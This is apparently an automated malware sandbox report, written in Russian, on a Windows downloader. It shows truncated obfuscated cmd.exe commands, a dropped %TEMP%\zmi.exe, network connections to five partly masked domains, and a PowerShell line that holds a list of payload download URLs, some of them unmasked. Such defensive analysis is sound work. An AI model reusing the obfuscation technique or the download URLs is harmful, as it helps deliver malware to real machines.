Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c %COMMonproGRAMw6432:~ 17, +1%^M^D; ; /V^: ; ; /R " ; ;( ( (s^eT ^ ^ ^M^q=3np p^e^M lP9 KwH ^yS^I^ ^ x^2^ Mua vX^k^ T^6^9 AO^L V^9^j^ ^ew4^ lqD Nqo ^P3c ^xNO 6^H^F g^T^y}^uQ^A^}nv^O{B...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\zmi.exe
Сетевая активность
Подключается к
- 'pi###lding.com':80
- 'em##esp.com':80
- 'be##yc.com':80
- 'in###asie.pl':80
- 'br#####enturesllc.com':80
TCP
Запросы HTTP GET
- http://pi###lding.com/818adl76
- http://www.em##esp.com/wp-content/1oDyu9fr3Z
- http://be##yc.com/dRqCZbI
- http://in###asie.pl/KSZyFNC
- http://br#####enturesllc.com/dX686Jo
UDP
- DNS ASK pi###lding.com
- DNS ASK em##esp.com
- DNS ASK be##yc.com
- DNS ASK in###asie.pl
- DNS ASK br#####enturesllc.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c %COMMonproGRAMw6432:~ 17, +1%^M^D; ; /V^: ; ; /R " ; ;( ( (s^eT ^ ^ ^M^q=3np p^e^M lP9 KwH ^yS^I^ ^ x^2^ Mua vX^k^ T^6^9 AO^L V^9^j^ ^ew4^ lqD Nqo ^P3c ^xNO 6^H^F g^T^y}^uQ^A^}nv^O{B...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' ; ; /V: ; ; /R " ; ;( ( (s^eT ^ ^ ^M^q=3np p^e^M lP9 KwH ^yS^I^ ^ x^2^ Mua vX^k^ T^6^9 AO^L V^9^j^ ^ew4^ lqD Nqo ^P3c ^xNO 6^H^F g^T^y}^uQ^A^}nv^O{BrahU^wIcR2dtC^lVak^YdccE1}p^ ^u^}2^Q^Bk...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $wim='kXO';$dFr='http://pi###lding.com/818adl76@http://www.emrsesp.com/wp-content/1oDyu9fr3Z@http://bemnyc.com/dRqCZbI@http://inaczasie.pl/KSZyFNC@http://bridgeventuresllc.com/dX686Jo'.Split('@...
